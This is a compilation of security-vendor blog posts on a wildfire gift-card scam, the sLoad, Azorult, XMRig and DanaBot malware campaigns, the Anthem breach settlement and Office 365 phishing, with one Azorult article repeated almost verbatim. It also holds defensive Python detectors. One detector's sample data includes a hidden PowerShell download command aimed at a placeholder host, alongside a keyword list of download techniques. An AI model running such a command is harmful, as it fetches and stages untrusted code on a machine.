If you own a publishing house or literary scouting agency and would like to improve your cyber defenses, get in touch with the TitanHQ team today for further information on cybersecurity solutions that can enhance your security posture against phishing and other email and web-based dangers.

California Wildfire Scam Alerts Issued

A California wildfire scam is underway that asks for financial donations to help the victims of the recent wildfires. The emails look like they are being sent from the CEO of a company and are directed at its employees in the accounts and finance department.

It should come as no shock that hackers are taking advantage of yet another natural disaster and are trying to con people into giving donations. Hackers often take advantage of natural disasters to pull on the heart strings and defraud companies. Similar scams were carried out following the recent hurricanes that hit the United States and caused widespread damage.

The California wildfire scam, discovered by Agari, is a form of business email compromise (BEC) attack. The emails look like they have been sent by the CEO of a company, with his/her email address used to send messages to company staff. This is often achieved by spoofing the email address although in some instances the CEO’s email account has been compromised and is used to share the messages.

The California wildfire scam has one major red flag. Instead of asking for a monetary donation, the scammers ask for Google Play gift cards and request that the redemption codes be sent back to the CEO by return.

The emails are sent to staff in the accounts and finance sections and the emails request that the money be sent in 4 x $500 denomination gift cards. If these are returned to the CEO, he/she will then forward them on to company clients that have been impacted by the California wildfires.

The reason Google Play gift cards are sought is that they can easily be exchanged on the darknet for other currencies. The gift cards are virtually impossible to trace back to the hacker.

The messages are full of grammatical mistakes. However, scams such as this are conducted because they work. Many people have been fooled by similar scams previously.

Safeguarding against scams such as this requires technical controls, end user training and strong company policies. An advanced spam filtering solution should be implemented – SpamTitan for instance – to prevent messages such as these from landing in inboxes. SpamTitan reviews all incoming emails for spam signatures and uses advanced methods such as heuristics, machine learning, and Bayesian analysis to identify advanced and never-before-seen phishing campaigns.

End user training is vital for all staff, especially those with access to corporate bank accounts. Those people are regularly targeted by hackers. Policies should be introduced that require all requests for changes to bank account details, atypical payment requests, and wire transfers above a certain threshold to be approved by phone or in person before they are authorized.

 

Stealthy sLoad Downloader Performs Extensive Reconnaissance Before Delivering Payload

In recent months, new and versatile malware downloaders have been discovered that gather a significant amount of data about users’ systems before deploying a malicious payload on them.

Marap malware and Xbash are two notable recent instances. Marap malware fingerprints a system and is capable of installing additional modules based on the results of the initial reconnaissance. XBash also reviews the system, and determines whether it is the best system for cryptocurrency mining or a ransomware attack and deploys its payload accordingly.

A further versatile and stealthy malware variant, named sLoad, can now be added to that list. sLoad was first discovered in May 2018, so it predates both of the above malware variants, although its use has been increasing.

The main aim of sLoad appears to be reconnaissance. Once installed on a system, it determines the location of the device from its IP address, performs several checks to determine the type of system and the software that is running, and establishes whether it is on a real device or in a sandbox environment. It checks the processes running on the system, compares them against a hardcoded list, and will exit if certain security software is installed, in order to avoid detection.

Once the system is suitable, a full scan of all running processes will be completed. The sLoad installer will search for Microsoft Outlook files, ICA files associated with Citrix, and other system information. sLoad is capable of capturing screenshots and searches the browser history looking for specific banking domains. All of this data is then fed back to the hackers’ C2 server.

Once the system has been fingerprinted, further malware variants are installed, primarily banking Trojans. Geofencing is used widely by the threat actors using sLoad which helps to ensure that banking Trojans are only placed on systems where they are likely to be effective – if the victim uses one of the banks that the Trojan is targeting.

In most of the campaigns seen so far, the banking Trojan of choice has been Ramnit. The attacks have also been very focused on specific countries, including Canada and, latterly, Italy and the United Kingdom, locations which are currently being targeted by Ramnit. Other malware variants linked to the sLoad downloader include the remote desktop tool DarkVNC, the Ursnif information stealer, DreamBot, and PsiBot.

The sLoad downloader is almost exclusively sent through spam email, with the campaigns often containing personal information such as the target’s name and address. While there have been many email subjects used, most commonly the emails relate to purchase orders, shipping notifications and missed packages.

The emails include Word documents with malicious macros in ZIP files, or alternatively embedded hyperlinks which download the ZIP file if clicked.

The sLoad downloader may be stealthy and versatile, but the threat can be blocked with an advanced spam filter. End user training to condition staff never to click hyperlinks from unknown senders, open unexpected attachments, or enable macros will also help to prevent infection. Web filtering solutions supply an additional layer of protection to block attempts to download malicious files from the Internet.

Updated Version of Azorult Malware Being Shared via RIG Exploit Kit

An updated version of Azorult malware has been discovered. The most recent version of the data stealer and malware downloader has already been deployed in attacks and is being shared via the RIG exploit kit.

Azorult malware is mainly an information stealer which is used to download usernames and passwords, credit card numbers, and other data including browser histories. Newer versions of the malware have seen cryptocurrency wallet-stealing capabilities included.

Azorult malware was first spotted in 2016 by researchers at Proofpoint and has since been deployed in a large number of attacks via exploit kits and phishing email campaigns. The latter have used hyperlinks to malicious sites, or more commonly, malicious Word files with malware downloaders.

In 2016, the malware variant was first installed with the Chthonic banking Trojan, although more recent campaigns have seen Azorult malware deployed as the primary malware payload. This year has seen many different threat actors pair the information stealer with a secondary ransomware payload.

Campaigns have been noticed using Hermes and Aurora ransomware as secondary payloads. In both campaigns, the main aim is to obtain login credentials to raid bank accounts and cryptocurrency wallets. When all useful information has been taken, the ransomware is activated, and a ransom payment is demanded to decrypt the files.

A new version of the Azorult was distributed in July 2018 – version 3.2 – which included significant improvements to both its stealer and downloader functions. Now Proofpoint researchers have discovered a new variant – version 3.3 – which has already been placed with RIG. The new variant was on the market shortly after the source code for the previous version was leaked online.

The new variant uses an alternative method of encryption, has improved cryptocurrency stealing functionality to permit the contents of BitcoinGold, electrumG, btcprivate (electrum-btcp), bitcore, and Exodus Eden wallets to be stolen, a new and improved loader, and a new admin panel. The latest version has a lower detection rate by AV software ensuring more installations.

The RIG exploit kit uses exploits for known flaws in Internet Explorer and Flash Player, which use JavaScript and VBScripts to download Azorult.

If your operating systems and software are always fully patched and current you will be secure from these exploit kit downloads as the vulnerabilities targeted by RIG are not new. However, many businesses are slow to apply patches, which need to be thoroughly tested. It is therefore strongly advisable to also use a web filtering solution such as WebTitan to provide additional protection against exploit kit malware downloads. WebTitan stops end users from visiting malicious websites such as those hosting exploit kits.

The most recent version of Azorult malware was first put on sale on October 4. It is possible that other threat actors will buy the malware and distribute it via phishing emails, as was the case with older versions. It is therefore wise to also put in place an advanced spam filter and ensure that end users are shown how to recognize malicious emails.

New Version of Azorult Malware Being Distributed via RIG Exploit Kit

An updated strain of Azorult malware has been discovered. The latest version of the data stealer and malware downloader has already been used in attacks and is being shared using the RIG exploit kit.

Azorult malware is mainly an information gatherer which is used to obtain usernames and passwords, credit card details, and other data including browser histories. Newer versions of the malware have seen cryptocurrency wallet-stealing capabilities included.

Azorult malware was first discovered in 2016 by researchers at Proofpoint and has since been utilized in a large number of attacks through exploit kits and phishing email campaigns. The latter have used links to malicious sites, or more typically, malicious Word files including malware downloaders.

Back in 2016, the malware variant was first installed in tandem with the Chthonic banking Trojan, although later campaigns have seen Azorult malware deployed as the primary malware payload. 2018 has seen multiple threat actors pair the information stealer with an accompanying ransomware payload.

Campaigns have been identified using Hermes and Aurora ransomware as secondary payloads. In both attacks, the initial goal is to steal login details to raid bank accounts and cryptocurrency wallets. When all useful data has been obtained, the ransomware is enabled, and a ransom payment is demanded in order to decrypt the files.

A new strain of the Azorult was issued in July 2018 – version 3.2 – which contained major improvements to both its stealer and downloader functions. Now Proofpoint researchers have discovered a new variant – version 3.3 – which has already been included with RIG. The new variant was released just after the source code for the previous version was leaked on the Internet.

The new variant uses an alternative method of encryption, has enhanced cryptocurrency stealing functionality to allow the contents of BitcoinGold, electrumG, btcprivate (electrum-btcp), bitcore, and Exodus Eden wallets to be obtained, a new and improved loader and an updated admin panel. The latest version is more difficult for AV software to detect, ensuring more installations.

The RIG exploit kit uses exploits for known flaws in Internet Explorer and Flash Player, which use JavaScript and VBScripts to install Azorult.

If your operating systems and software are kept fully updated you will be safeguarded against these exploit kit downloads as the vulnerabilities exploited by RIG are not new. However, many businesses are slow to apply patches, which need to be extensively tested. It is therefore important to also deploy a web filtering solution.

XMRig Cryptocurrency Miner Installed Using Fake Adobe Flash Updates

Using fake software updates to spread malware is not a new phenomenon, but a new malware campaign has been discovered that is quite different. Fake Adobe Flash updates are being spread that actually do update the user’s Flash version, albeit with the addition of the XMRig cryptocurrency miner.

The campaign deploys pop-up notifications that are an exact replica of the authentic notifications used by Adobe, telling the user that their Flash version needs to be updated. Clicking on the install button, as with the authentic notifications, will update users’ Flash to the most recent version. However, in the background, the XMRig cryptocurrency miner is also downloaded and installed. Once downloaded, XMRig will operate silently in the background, unbeknown to the user.

The campaign was discovered by security experts at Palo Alto Networks’ Unit 42 team. The researchers found several Windows executable files with names beginning with AdobeFlashPlayer that were hosted on cloud servers not controlled by Adobe.

A review of network traffic during the infection process revealed that most of the traffic was related to updating Adobe Flash from an Adobe-controlled domain, but that this soon changed to traffic through a domain associated with downloaders known to push cryptocurrency miners. Traffic was later identified over TCP port 14444 that is associated with the XMRig cryptocurrency miner.

Additional analysis of the campaign showed it has been operating since mid-August, with activity increasing in September when the fake Adobe Flash updates started to be distributed more widely.

End users are unlikely to notice the downloading and installation of the XMRig cryptocurrency miner, but there is likely to be a noticeable slowdown in the operation of their computer. The installation of the XMRig cryptocurrency miner may be stealthy, but when it runs it takes up almost all of the computer’s CPU for cryptocurrency mining. Any user that reviews Task Manager will see Explorer.exe hogging their CPU. As with the majority of cryptocurrency miners, XMRig mines Monero. What is not currently obvious is which websites are distributing the fake Adobe Flash updates, or how traffic is being sent to those sites.
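The two network indicators described above (Flash-named binaries served from hosts outside Adobe's domain, and outbound connections on TCP port 14444) can be checked against proxy and firewall logs. The following is an added example, not code from Unit 42 or from the original article; the log format and all host names and addresses are constructed for illustration.

```python
from urllib.parse import urlparse

# Constructed log lines in an assumed two-source format (not real data):
#   "proxy <workstation> <url>"        one line per proxied download
#   "conn  <workstation> <ip>:<port>"  one line per outbound TCP connection
SAMPLE_LOGS = [
    "proxy ws-17 https://fpdownload.adobe.com/get/flashplayer/update/current/install.exe",
    "proxy ws-17 https://files.example-cloud-host.test/AdobeFlashPlayer_1034.exe",
    "conn ws-17 203.0.113.45:14444",
    "proxy ws-22 https://fpdownload.adobe.com/get/flashplayer/update/current/install.exe",
    "conn ws-22 198.51.100.7:443",
]

# Port the article associates with the XMRig miner's traffic.
MINER_PORTS = {14444}


def is_adobe_host(host):
    """True only for adobe.com itself or a subdomain of it."""
    host = (host or "").lower()
    return host == "adobe.com" or host.endswith(".adobe.com")


def analyse(lines):
    """Return {workstation: [finding, ...]} for hosts showing the campaign's indicators."""
    findings = {}
    for line in lines:
        kind, workstation, rest = line.split(" ", 2)
        if kind == "proxy":
            url = urlparse(rest)
            filename = url.path.rsplit("/", 1)[-1]
            # A genuine Flash update comes from Adobe; the lure binaries did not.
            if filename.lower().startswith("adobeflashplayer") and not is_adobe_host(url.hostname):
                findings.setdefault(workstation, []).append(
                    f"Flash-named binary fetched from non-Adobe host {url.hostname}")
        elif kind == "conn":
            ip, port = rest.rsplit(":", 1)
            if int(port) in MINER_PORTS:
                findings.setdefault(workstation, []).append(
                    f"outbound TCP {port} to {ip} (port associated with XMRig traffic)")
    return findings


if __name__ == "__main__":
    for ws, hits in analyse(SAMPLE_LOGS).items():
        print(ws, "->", "; ".join(hits))
```

ws-22 performed only the legitimate Adobe update and produces no finding; ws-17 downloaded the lure binary and then contacted the miner port.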

Any alert about a software update that pops up while browsing the internet should be treated as suspicious. The window should be closed, and the official website of that software supplier should be visited to determine if an update is required. Software updates should only ever be installed from official websites; in the case of Adobe Flash, that is Adobe.com.

The Palo Alto experts say “Organizations with decent web filtering and educated users have a much lower risk of infection by these fake updates.”

Anthem Data Breach Settlement for Spear Phishing Attack is $16 Million

Due to a massive data breach in 2015 in which 78.8 million health plan records were stolen, Anthem Inc. has settled a class action data breach lawsuit for $115 million, and OCR has now agreed a $16 million data breach settlement with the health insurer.

Before the announcement of the settlement, the unenviable record was held by Science Applications International Corporation, a vendor used by healthcare groups, which suffered a 4.9 million record breach in 2011. The Anthem data breach was on a completely different scale.

The hackers responsible for the Anthem data breach were clearly skilled. Mandiant, the cybersecurity company that assisted with the investigation, suspected the attack was a nation-state funded cyberattack. The hackers managed to obtain access to Anthem’s data warehouse and downloaded a huge volume of data undetected. The time from the first attack to discovery was almost a year.

While the attack was complex, a foothold in the network was not obtained through an elaborate hack or zero-day exploit but through phishing emails.

At least one staff member responded to a spear phishing email, sent to one of Anthem’s subsidiaries, which gave the hackers the entry point they needed to launch another attack and gain access to Anthem’s health plan member database.

The U.S. Department of Health and Human Services’ Office for Civil Rights (OCR) looks into healthcare data breaches that lead to the exposure or theft of 500 or more records. An in-depth review of the Anthem breach was therefore a certainty given its size. A fine for non-compliance with Health Insurance Portability and Accountability Act (HIPAA) Rules was a very likely outcome as HIPAA requires healthcare groups to safeguard health data. The scale of the breach also made it likely that it would lead to the largest ever penalty for a healthcare data breach.

Previous to the Anthem data breach settlement, the largest fine for a healthcare data breach was $5.55 million, which was agreed between OCR and Advocate Health Care Network in 2016. The Anthem data breach settlement was almost three times that figure, which reflected the seriousness of the breach, the number of people affected, and the extent to which HIPAA Rules were alleged to have been breached.

OCR claimed that Anthem Inc., had breached five provisions of HIPAA Rules, and by doing so failed to stop the breach and limit its severity. The Anthem data breach settlement was however agreed with no admission of liability.

The regulatory fine is just a small fraction of the total cost of the Anthem data breach. On top of the Anthem data breach settlement with OCR, Anthem faced multiple legal actions in the wake of the data breach. The consolidated class action lawsuit was settled by Anthem in January 2018 for $115 million.

The class action settlement document showed that Anthem had already paid $2.5 million to consultants in the wake of the breach, $31 million was spent mailing alert letters, $115 million went on enhancements to security, and $112 million was paid to provide identity theft protection and credit monitoring services to affected plan subscribers.

With the $115 million class action settlement and the $16 million OCR settlement, that brings the overall cost of the Anthem data breach to $391.5 million.

At $391.5 million, that makes this the most costly healthcare phishing campaign by some distance and the cost clearly emphasises just how important it is to implement a defense-in-depth strategy to safeguard against phishing attacks.

Cloud Service Providers’ SSL Certificates Targeted by Office 365 Phishing Attacks

Office 365 phishing attacks are widely witnessed and very realistic, with Office 365 spam filtering controls easily being bypassed by scammers to ensure messages reach inboxes.

Additionally, phishing forms are being hosted on webpages that are secured with valid Microsoft SSL certificates to fool users into believing the websites are genuine.

If a phishing email makes it past perimeter defenses and arrives in an inbox, there are a number of tell-tale signs that the email is not real.

Often there are spelling mistakes and incorrect grammar, and the messages are sent from questionable senders or domains. To bolster the response rate, scammers are now spending much more time carefully crafting their phishing emails, and they are often virtually indistinguishable from real communications from the brand they are spoofing. In terms of style, they are carbon copies of genuine emails, complete with the branding, contact data, sender details, and logos of the company being spoofed. The subject is perfectly believable and the content well written. The actions the user is asked to complete are perfectly plausible.

Hyperlinks in the emails bring users to a website where they are required to enter their login credentials. At this stage of the phishing attack there are usually additional signs that all is not as it seems. A warning may be included in a pop-up to say that the website may not be genuine, the website address may begin with HTTP rather than the secure HTTPS, or the SSL certificate may not be owned by the business that the website is spoofing.

Even these tell-tale signs are not always evident, as has been shown in many recent Office 365 phishing attacks, which have the phishing forms hosted on webpages that have existing, genuine Microsoft SSL certificates or SSL certificates that have been issued to other cloud service providers such as CloudFlare, DocuSign, or Google.
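The point of the passage above is that HTTPS and a valid certificate only prove the page belongs to the host serving it, not to the brand the page imitates. The following added example (not code from the original article) shows the check a defender can automate: compare both the link's host and the certificate's names against the brand's real login domains. The certificate dicts follow the shape returned by Python's ssl.getpeercert() and are constructed; the cloud host name is a placeholder.

```python
from urllib.parse import urlparse

# Domains a genuine Microsoft sign-in page is expected to live under (assumed list).
MICROSOFT_LOGIN_DOMAINS = ("microsoftonline.com", "microsoft.com", "office.com")

# Constructed certificates in ssl.getpeercert() layout.
GENUINE_CERT = {
    "subject": ((("commonName", "login.microsoftonline.com"),),),
    "subjectAltName": (("DNS", "login.microsoftonline.com"), ("DNS", "login.microsoft.com")),
}
# Perfectly valid certificate for a cloud storage host that anyone can upload a page to.
CLOUD_CERT = {
    "subject": ((("commonName", "*.example-cloudstorage.test"),),),
    "subjectAltName": (("DNS", "*.example-cloudstorage.test"),),
}


def under_domain(host, domain):
    return host == domain or host.endswith("." + domain)


def san_matches(pattern, host):
    """Hostname match; a wildcard covers exactly one left-most label."""
    if pattern.startswith("*."):
        return host.count(".") == pattern.count(".") and host.endswith(pattern[1:])
    return host == pattern


def assess_login_link(url, cert, brand_domains=MICROSOFT_LOGIN_DOMAINS):
    """Return a list of warnings; an empty list means nothing looked wrong."""
    u = urlparse(url)
    host = (u.hostname or "").lower()
    warnings = []
    if u.scheme != "https":
        warnings.append("not HTTPS")
    if not any(under_domain(host, d) for d in brand_domains):
        warnings.append(f"host {host} is not a brand login domain")
    sans = [v.lower() for k, v in cert.get("subjectAltName", ()) if k == "DNS"]
    if not any(san_matches(s, host) for s in sans):
        warnings.append("certificate does not match the host")  # a browser would warn here
    else:
        # Valid for this host, but does the certificate name any brand domain at all?
        bare = [s[2:] if s.startswith("*.") else s for s in sans]
        if not any(under_domain(b, d) for b in bare for d in brand_domains):
            warnings.append("certificate is valid for the host but not for any brand login domain")
    return warnings


if __name__ == "__main__":
    print(assess_login_link("https://login.microsoftonline.com/common/oauth2/authorize", GENUINE_CERT))
    print(assess_login_link("https://tenant-verify.example-cloudstorage.test/o365/login.html", CLOUD_CERT))
```

The second call passes the browser's own checks (HTTPS, matching certificate) and is flagged only by comparing the host and certificate names with the brand's domains, which is the comparison users rarely make.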

Office 365 users are being targeted by scammers as they know Office 365 phishing controls can be easily circumvented. Even with Microsoft’s Advanced Threat Protection for Office 365, phishing emails are still delivered. A 2017 study by SE Labs showed that even with this additional anti-phishing control, Office 365 anti-phishing measures were only rated in the low-middle of the market for the security offered. With only the basic Exchange Online Protection, the protection was worse still.

Whether you operate an SMB or a large enterprise, you are likely to be sent high volumes of spam and phishing emails and many messages will be delivered to end users’ inboxes. Since the emails can be virtually impossible for end users to identify as dangerous, it is probable that all but the most experienced, well trained, security conscious workers will be tricked. What is therefore needed is an advanced third-party spam filtering solution that will work in tandem with Office 365 spam filtering controls to provide far greater security.

While Office 365 will prevent spam emails and phishing emails (Osterman Research proved it blocks 100% of known malware), it has been shown to lack performance against advanced phishing threats like spear phishing.

Office 365 does not have the same range of predictive technology as dedicated on-premises and cloud-based email security gateways which are much better at detecting zero-day attacks, new malware, and advanced spear phishing attacks.

To enhance protection you require a dedicated third-party spam filtering solution for Office 365 such as SpamTitan. SpamTitan focuses on defense in depth, and provides better protection against advanced phishing attacks, new malware, and complex email attacks to ensure malicious messages are blocked or quarantined instead of being delivered to end users’ inboxes. Some of the additional security measures provided by SpamTitan against Office 365 phishing attacks are detailed in the image below:

To discover more about making Office 365 safer and how SpamTitan can be of advantage to your company, get in touch with TitanHQ.


U.S. Banks Being Attacked by DanaBot Trojan

In May, security experts at Proofpoint noticed a spam email campaign that was distributing a new banking Trojan named DanaBot. At the time it was believed that a single threat actor was using the DanaBot Trojan to target groups in Australia to obtain online banking details.

That campaign is still ongoing, but in addition, campaigns have been identified in Europe attacking customers of banks in Italy, Germany, Poland, Austria, and the UK. Then in late September, a further DanaBot Trojan campaign was carried out targeting U.S. banks.

The DanaBot Trojan is a modular malware coded in Delphi that can install additional components to add various different functions.

The malware can capture screenshots, steal form data, and log keystrokes in order to obtain banking details. That data is sent back to the hackers’ C2 server and is subsequently used to steal money from corporate bank accounts.

A review of the malware and the geographical campaigns shows different IDs are used in the C2 communication headers. This strongly implies that the campaigns in each region are being carried out by different individuals and that the DanaBot Trojan is being provided as malware-as-a-service. Each threat actor is responsible for running campaigns in a specific country or set of countries. Australia is the only country where there are two affiliates operating campaigns. Overall, there appear to be nine individuals currently running distribution campaigns.

The country-specific campaigns are employing different methods to deliver the malicious payload, including the new Fallout exploit kit, web injects, and spam email. The last of these is being used to distribute the Trojan in the United States.

The U.S. campaign uses a fax notice lure with the emails seeming to come from the eFax service. The messages look professional and include all the appropriate formatting and logos. The emails contain a button that must be clicked to download the 3-page fax message to the device.

Clicking on the button downloads a Word document with a malicious macro which, if allowed to run, will launch a PowerShell script that downloads the Hancitor downloader. Hancitor will then download the Pony stealer and the DanaBot Trojan.
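The delivery chain just described (Word document, macro, PowerShell, downloader) leaves a recognisable process lineage: an Office application spawning a scripting host. The following added example (not Proofpoint's code or anything from the original article) applies that detection to process-creation records in the shape of Sysmon Event ID 1 fields; the records, paths and URL are constructed for illustration.

```python
import ntpath

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Substrings that suggest the script host is fetching a second stage (defensive hints only).
DOWNLOAD_HINTS = ("downloadfile", "downloadstring", "invoke-webrequest", "net.webclient", "-enc")

# Constructed events with the Sysmon ProcessCreate field names (not real telemetry).
EVENTS = [
    {"Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"WINWORD.EXE" /n "C:\Users\jane\Downloads\eFax_message.doc"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": "powershell.exe -w hidden -nop (New-Object Net.WebClient).DownloadFile('http://placeholder.invalid/h.exe','C:\\Users\\jane\\AppData\\Local\\Temp\\h.exe')"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\inventory.ps1"},  # benign admin use
]


def basename(path):
    """Lower-cased file name from a Windows path."""
    return ntpath.basename(path).lower()


def suspicious_office_children(events):
    """Return one finding per script host spawned directly by an Office application."""
    findings = []
    for ev in events:
        parent, child = basename(ev["ParentImage"]), basename(ev["Image"])
        if parent in OFFICE_APPS and child in SCRIPT_HOSTS:
            cmd = ev["CommandLine"].lower()
            findings.append({
                "parent": parent,
                "child": child,
                "download_hint": any(h in cmd for h in DOWNLOAD_HINTS),
            })
    return findings


if __name__ == "__main__":
    for f in suspicious_office_children(EVENTS):
        print(f)
```

The benign PowerShell launch from explorer.exe is not flagged; only the instance spawned by WINWORD.EXE is, and the download hint marks it as matching the macro-to-downloader pattern.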

Proofpoint’s investigation into the malware revealed similarities with the ransomware groups Reveton and CryptXXX, which suggests that DanaBot has been created by the same group responsible for both of those ransomware threats.

The U.S. DanaBot campaign is attacking customers of various U.S. banks, including RBC Royal Bank, Royal Bank, TD Bank, Wells Fargo, Bank of America, and JP Morgan Chase. It is probable that the campaigns will spread to other countries as more threat actors are signed up to use the malware.

Stopping attacks requires defense in depth against all attack vectors. An advanced spam filter is needed to block malspam. Users of Office 365 should enhance protection with a third-party spam filter such as SpamTitan to provide better security against this threat. To prevent web-based attacks, a web filtering solution should be implemented. WebTitan can block efforts by end users to visit websites known to include exploit kits and IPs that have previously been used for malicious reasons.

End users should also be advised never to open email attachments or click on hyperlinks in emails from unknown senders, or to enable macros on documents unless they are 100% certain that the files are authentic. Companies in the United States should also consider warning their employees about fake eFax emails to raise awareness of the danger.
